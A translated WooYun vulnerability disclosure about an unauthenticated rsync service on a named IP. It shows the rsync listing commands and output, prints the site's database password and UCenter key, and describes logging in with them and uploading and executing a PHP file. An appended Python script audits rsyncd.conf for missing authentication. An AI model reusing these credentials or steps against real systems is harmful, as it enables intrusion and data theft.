WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2013-10-25: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2013-12-09: The vendor has chosen to ignore the vulnerability; details are disclosed to the public.
Misconfigured rsync leads to data leakage
118.144.94.98 runs an rsync service, but it can be accessed directly without any authentication. Running rsync 118.144.94.98::www to sync the website content to a local machine succeeded:
rsync 118.144.94.98::www/love/
drwxrwxrwx        4096 2013/10/25 16:08:46 .
-rwxr-xr-x        2596 2011/10/11 09:48:42 admin.php
-rwxr-xr-x         741 2011/10/11 09:48:42 api.php
-rwxr-xr-x         877 2011/10/11 09:48:42 connect.php
-rwxr-xr-x         253 2011/10/11 09:48:42 cp.php
-rwxr-xr-x         106 2011/10/11 09:48:42 crossdomain.xml
-rwxr-xr-x        5558 2011/10/11 09:48:42 favicon.ico
-rwxr-xr-x        2112 2011/10/11 09:48:42 forum.php
-rwxr-xr-x         883 2011/10/11 09:48:42 group.php
-rwxr-xr-x        1096 2011/10/11 09:48:42 home.php
-rwxr-xr-x        5517 2011/10/11 09:48:42 index8.php
-rwxr-xr-x         956 2011/10/11 09:48:42 member.php
-rwxr-xr-x        1355 2011/10/11 09:48:42 misc.php
-rwxr-xr-x        1731 2011/10/11 09:48:42 plugin.php
-rwxr-xr-x        1077 2011/10/11 09:48:42 portal.php
-rwxr-xr-x         582 2011/10/11 09:48:42 robots.txt
-rwxr-xr-x        1192 2011/10/11 09:48:42 search.php
-rwxr-xr-x        1706 2011/10/11 09:48:42 userapp.php
drwxr-xr-x        4096 2011/12/02 15:42:36 api
drwxr-xr-x        4096 2011/12/02 15:42:36 archiver
drwxr-xr-x        4096 2011/12/02 15:44:56 config
drwxr-xr-x        4096 2011/12/04 19:46:44 data
drwxr-xr-x        4096 2011/12/02 16:11:56 install
drwxr-xr-x        4096 2013/10/25 16:08:09 iphone
drwxr-xr-x        4096 2012/07/11 18:51:06 mysql
drwxr-xr-x        4096 2011/12/02 15:42:36 source
drwxr-xr-x        4096 2011/12/02 15:42:36 static
drwxr-xr-x        4096 2011/12/02 15:42:38 template
drwxr-xr-x        4096 2011/12/02 15:42:40 uc_client
drwxr-xr-x        4096 2011/12/02 15:42:40 uc_server
A large number of user-uploaded images were found stored here:
rsync 118.144.94.98::www/love/data/attachment/album/
drwxr-xr-x        4096 2013/10/01 17:26:03 .
-rwxr-xr-x           0 2011/10/11 09:48:42 index.htm
drwxr-xr-x        4096 2012/03/12 13:52:25 201203
drwxr-xr-x        4096 2012/04/27 11:02:15 201204
drwxr-xr-x        4096 2012/05/31 12:04:35 201205
drwxr-xr-x        4096 2012/06/30 01:10:05 201206
drwxr-xr-x        4096 2012/07/31 00:21:19 201207
drwxr-xr-x        4096 2012/08/31 01:31:38 201208
drwxr-xr-x        4096 2012/09/30 05:21:14 201209
drwxr-xr-x        4096 2012/10/31 00:03:06 201210
drwxr-xr-x        4096 2012/11/30 03:32:52 201211
drwxr-xr-x        4096 2012/12/31 00:00:20 201212
drwxr-xr-x        4096 2013/01/31 00:00:04 201301
drwxr-xr-x        4096 2013/02/28 00:48:00 201302
drwxr-xr-x        4096 2013/03/31 01:02:25 201303
drwxr-xr-x        4096 2013/04/30 00:40:11 201304
drwxr-xr-x        4096 2013/05/31 00:26:16 201305
drwxr-xr-x        4096 2013/06/30 01:06:31 201306
drwxr-xr-x        4096 2013/07/31 00:06:46 201307
drwxr-xr-x        4096 2013/08/31 00:48:07 201308
drwxr-xr-x        4096 2013/09/30 04:10:57 201309
drwxr-xr-x        4096 2013/10/25 09:33:43 201310
drwxr-xr-x        4096 2012/03/05 14:04:10 cover
Reading the configuration file reveals that the database password is adoado:
<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'love');
define('UC_DBPW', 'adoado');
define('UC_DBNAME', 'love');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`love`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '02EeJ5K2q7w775F8I91186tcz9fc9cE0Q0U9B19bQ0O8Vcg329a141b8R2x8Sf09');
define('UC_API', 'http://api.qingrenjie.me:88/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
define('UC_PPP', 20);
Logging in to UCenter with this password was attempted. UCenter statistics: total applications: 2; total users: 59563; private messages: 0; friend records: 30. Uploading env.php through rsync and executing it succeeded, as shown below:
PHP Version 5.2.17p1
System Linux SNDA-172-17-11-3 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Build Date Jul 11 2012 16:13:37
Configure Command './configure' '--prefix=/usr/local/php' '--with-config-file-path=/usr/local/php/etc' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-iconv-dir' '--with-freetype-dir' '--with-jpeg-dir' '--with-png-dir' '--with-zlib' '--with-libxml-dir=/usr' '--enable-xml' '--disable-rpath' '--enable-discard-path' '--enable-magic-quotes' '--enable-safe-mode' '--enable-bcmath' '--enable-shmop' '--enable-sysvsem' '--enable-inline-optimization' '--with-curl' '--with-curlwrappers' '--enable-mbregex' '--enable-mbstring' '--with-mcrypt' '--enable-ftp' '--with-gd' '--enable-gd-native-ttf' '--with-openssl' '--with-mhash' '--enable-pcntl' '--enable-sockets' '--with-xmlrpc' '--enable-zip' '--enable-soap' '--without-pear' '--with-gettext' '--with-mime-magic'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /usr/local/php/etc
Loaded Configuration File /usr/local/php/etc/php.ini
End of penetration test.
rsync must require authentication.
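As an added defender-side check that is not part of the original report, the following Python script parses an rsyncd.conf and flags modules that, like the one described above, are reachable without "auth users", lack a "hosts allow" restriction, or accept uploads ("read only = no"). Both configurations below are constructed samples; the module path, user name and network are assumptions.

```python
import configparser

# Constructed sample rsyncd.conf with the shape that produces the exposure in
# this report: a module anyone can read from and write to, no auth, no allow list.
WEAK_RSYNCD_CONF = """\
uid = nobody
[www]
path = /data/www
read only = no
list = yes
"""

# Constructed hardened counterpart: named users checked against a secrets file,
# a source-network allow list, no anonymous writes, and no module listing.
HARDENED_RSYNCD_CONF = """\
uid = nobody
[www]
path = /data/www
read only = yes
auth users = backup
secrets file = /etc/rsyncd.secrets
hosts allow = 10.0.0.0/8
list = no
"""

def audit_rsyncd_conf(text):
    """Return {module: [findings]} for every module with a risky setting."""
    # rsync's global parameters (those before the first [module]) act as defaults
    # for every module, which is exactly what configparser's DEFAULT section does.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string("[DEFAULT]\n" + text)
    findings = {}
    for module in cp.sections():
        sec = cp[module]
        problems = []
        if not sec.get("auth users", "").strip():
            problems.append("no 'auth users': readable by anyone who can reach the port")
        elif not sec.get("secrets file", "").strip():
            problems.append("'auth users' set but no 'secrets file': auth cannot succeed")
        if not sec.get("hosts allow", "").strip():
            problems.append("no 'hosts allow': no source-address restriction")
        # rsync defaults 'read only' to yes; an explicit 'no' lets clients upload files.
        if sec.get("read only", "yes").strip().lower() in ("no", "false", "0"):
            problems.append("'read only = no': clients can write into the module")
        if problems:
            findings[module] = problems
    return findings
```

Run it against /etc/rsyncd.conf before exposing the daemon; an empty result means every module has authentication, an allow list and no anonymous writes.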
Unable to contact the vendor, or the vendor actively declined.